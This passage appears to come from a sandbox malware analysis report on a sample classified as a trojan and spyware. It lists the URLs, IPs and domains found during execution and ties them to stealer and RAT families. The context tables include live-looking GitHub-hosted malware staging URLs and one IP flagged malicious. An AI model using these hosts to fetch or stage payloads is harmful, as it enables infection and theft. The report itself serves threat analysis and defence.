                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/PrepareMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1473468111.0000000004751000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://objects.githubusercontent.com/github-production-release-asset-2e65be/882783246/b23a0dba-ce399LrEuTWP8s.exe, 00000001.00000002.1531789671.00000000033CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceMSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1475483757.00000000057B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://discord.com/api/v9/users/MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/faultMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsatMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://tempuri.org/example/Field1ResponseMSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://tempuri.org/example/Field1ResponseDMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name9LrEuTWP8s.exe, 00000001.00000002.1531789671.0000000003331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1473468111.0000000004751000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://api.ip.sb/ipMSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1473468111.00000000048A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1473468111.00000000048A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1473468111.00000000048A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2004/04/scMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://contoso.com/Iconpowershell.exe, 00000003.00000002.1475483757.00000000057B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1473468111.00000000048A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedMSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressingMSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://tempuri.org/example/Field3ResponseDMSBuild.exe, 00000008.00000002.1650116521.00000000030B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1473468111.00000000048A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trustMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://objects.githubusercontent.com9LrEuTWP8s.exe, 00000001.00000002.1531789671.00000000033F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/NonceMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsMSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RenewMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://github.com9LrEuTWP8s.exe, 00000001.00000002.1531789671.000000000339B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://tempuri.org/example/Field1MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2006/02/addressingidentityMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://contoso.com/Licensepowershell.exe, 00000003.00000002.1475483757.00000000057B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://schemas.xmlsoap.org/soap/envelope/MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://tempuri.org/example/Field2MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://tempuri.org/example/Field3MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trustMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://objects.githubusercontent.comd9LrEuTWP8s.exe, 00000001.00000002.1531789671.00000000033F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://tempuri.org/DMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/06/addressingexMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://github.com9LrEuTWP8s.exe, 00000001.00000002.1531789671.00000000033AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoorMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseMSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/RenewMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKeyMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://contoso.com/powershell.exe, 00000003.00000002.1475483757.00000000057B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://www.w3.oMSBuild.exe, 00000008.00000002.1650116521.00000000030B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://tempuri.org/example/Field3ResponseMSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1650116521.00000000030B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/faultMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyMSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponseMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1475483757.00000000057B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high

                                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                140.82.121.4
                                                                                                                                                                                                                                		github.comUnited States
                                                                                                                                                                                                                                		36459GITHUBUSfalse
                                                                                                                                                                                                                                185.199.111.133
                                                                                                                                                                                                                                		objects.githubusercontent.comNetherlands
                                                                                                                                                                                                                                		54113FASTLYUSfalse
                                                                                                                                                                                                                                4.251.123.83
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		3356LEVEL3UStrue

                                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                Analysis ID:1554430
                                                                                                                                                                                                                                Start date and time:2024-11-12 14:49:13 +01:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 7m 56s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:12
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:9LrEuTWP8s.exe
                                                                                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                                                                                Original Sample Name:602a6a9693cdc77d1576ea6da66fd56e77c87a89ecef0d39b44563b93f8cc6b1.exe
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@11/11@2/3
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 75%
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                • Number of executed functions: 378
                                                                                                                                                                                                                                • Number of non-executed functions: 23
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                • Stop behavior analysis, all processes terminated

                                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 52.149.20.212, 52.165.164.15, 13.85.23.206, 20.3.187.198, 131.107.255.255
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, dns.msftncsi.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                • Execution Graph export aborted for target 9LrEuTWP8s.exe, PID 7620 because it is empty
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                • VT rate limit hit for: 9LrEuTWP8s.exe

                                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                08:50:18API Interceptor28x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                08:50:25API Interceptor22x Sleep call for process: 9LrEuTWP8s.exe modified
                                                                                                                                                                                                                                08:50:37API Interceptor22x Sleep call for process: MSBuild.exe modified

                                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                140.82.121.4RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • github.com/ssbb36/stv/raw/main/5.mp3
                                                                                                                                                                                                                                185.199.111.133cr_asm2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                                                                                cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                                                                                BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                                                                                4.251.123.83i4w1K6ft2F.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                                                                                  xMYbN0Yd2a.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                                                                                    FaZM14kDMN.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                                                                                      j7movK82QT.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                                                                                        Z4uyrnCQ8L.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse

                                                                                                                                                                                                                                            Domains

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            github.comSecuriteInfo.com.Win32.MalwareX-gen.20028.17631.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                                                                            List Furniture.batGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            BB.batGet hashmaliciousBraodoBrowse
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            meN9qeS2DE.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                                                                            Payment Confirmation (237 KB).msgGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            19532311200120230008100 Responsabilidad Civil Contractual extracontractual.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            3KOX6gQCoE.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            QzX4KXBXPq.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                                                                            SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            malware-DONT-RUN.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            objects.githubusercontent.commeN9qeS2DE.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                                                                            Payment Confirmation (237 KB).msgGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                                                                            malware-DONT-RUN.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 185.199.109.133
                                                                                                                                                                                                                                            SecuriteInfo.com.Win64.Riskware.ExplorerPatcher.B.21185.8531.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                                                                                            SecuriteInfo.com.Trojan.GenericKD.74442994.24259.8937.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                                                                                            Pt7TlAjQtn.exeGet hashmaliciousAveMaria, WhiteSnake StealerBrowse
                                                                                                                                                                                                                                            • 185.199.109.133
                                                                                                                                                                                                                                            file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                                                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                                                                            SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 185.199.110.133
